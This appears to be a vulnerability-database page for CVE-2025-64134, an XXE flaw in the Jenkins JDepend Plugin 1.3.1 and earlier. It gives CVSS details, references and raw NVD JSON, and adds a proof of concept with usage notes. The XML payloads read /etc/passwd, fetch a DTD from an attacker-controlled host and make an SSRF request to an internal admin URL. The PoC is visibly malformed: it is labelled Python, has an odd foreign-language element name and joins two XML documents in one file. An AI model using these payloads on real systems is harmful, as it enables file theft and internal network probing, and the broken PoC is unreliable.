CVE-2025-64134

Description

Jenkins JDepend Plugin 1.3.1 and earlier includes an outdated version of JDepend Maven Plugin that does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:jdepend:*:*:*:*:*:jenkins:*:* - VULNERABLE

Jenkins JDepend Plugin <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2025-64134: Jenkins JDepend Plugin XXE -->
<!-- This PoC demonstrates how an attacker can exploit the XXE vulnerability -->
<!-- Usage: Place this XML file in a project directory that Jenkins will analyze -->

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jdepend [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY xxe2 SYSTEM "http://attacker-controlled-server/xxe.dtd">
]>
<jdepend>
  <packages>
    <package name="com.example.vulnerable">
      <度量>&xxe;</度量>
    </package>
  </packages>
</jdepend>

<!-- For SSRF attack -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "http://internal-network-server:8080/admin">
]>
<data>&file;</data>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64134
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64134
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64134/
[4] VulDB https://vuldb.com/cve/CVE-2025-64134
[5] https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-2936
[6] http://www.openwall.com/lists/oss-security/2025/10/29/2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64134", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:57.613", "lastModified": "2025-11-05T17:35:42.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins JDepend Plugin 1.3.1 and earlier includes an outdated version of JDepend Maven Plugin that does not configure its XML parser to prevent XML external entity (XXE) attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jdepend:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "1.3.1", "matchCriteriaId": "278758E7-6D4A-408B-B6C1-89097186AFAC"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-2936", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}